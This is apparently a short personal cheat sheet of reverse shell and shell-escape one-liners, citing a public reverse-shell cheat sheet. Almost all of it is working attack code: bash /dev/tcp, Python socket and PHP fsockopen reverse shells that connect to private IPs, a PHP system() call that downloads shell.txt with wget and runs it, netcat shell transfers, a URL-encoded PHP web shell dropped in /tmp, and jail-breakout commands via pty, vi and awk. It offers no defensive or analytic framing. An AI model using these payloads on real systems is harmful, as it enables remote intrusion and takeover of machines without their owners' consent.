Reverse Shell

https://highon.coffee/blog/reverse-shell-cheat-sheet/

 

connect back at 103 with bash

bash -i >& /dev/tcp/192.168.8.104/1234 0>&1

python reverse shell

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.10.10.128”,443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

 

php with bash

<?php exec(“/bin/bash -c ‘bash -i >& /dev/tcp/192.168.8.104/8888 0>&1′”); ?>

 

php reverse shell.txt, to host

<?php $sock=fsockopen(“10.0.0.1”,1234);exec(“/bin/sh -i <&3 >&3 2>&3”);?>

to download and execute shell

<?php system(“wget 192.168.8.103/shell.txt -O /tmp/shell.php; php /tmp/shell.php”); ?>

 

transfer shell with nc

nc -lvp 1234 < php_reverse_shell.php
cmd=nc 192.168.8.102 123 > reverse-shell.php
-w 1
-q 1
/browse.php?file=/tmp/shell2.php&cmd=nc+-w+1+10.10.14.4+5555+>+/tmp/shell5.php

Is it possible to break out of “jail” shell

python -c “import pty; pty.spawn(‘/bin/bash’);”

 

echo os.system(‘/bin/bash’)

/bin/sh -i

vi -> :sh or :!UNIX_command

awk ‘BEGIN{system(“/bin/bash”)}’

 

<?php system(“wget 192.168.8.103/shell.txt -O /tmp/shell.php; php /tmp/shell.php”); ?>

echo+%22%3C%3Fphp+system(\$_GET['cmd']);%3F%3E%22+>+/tmp/shell2.php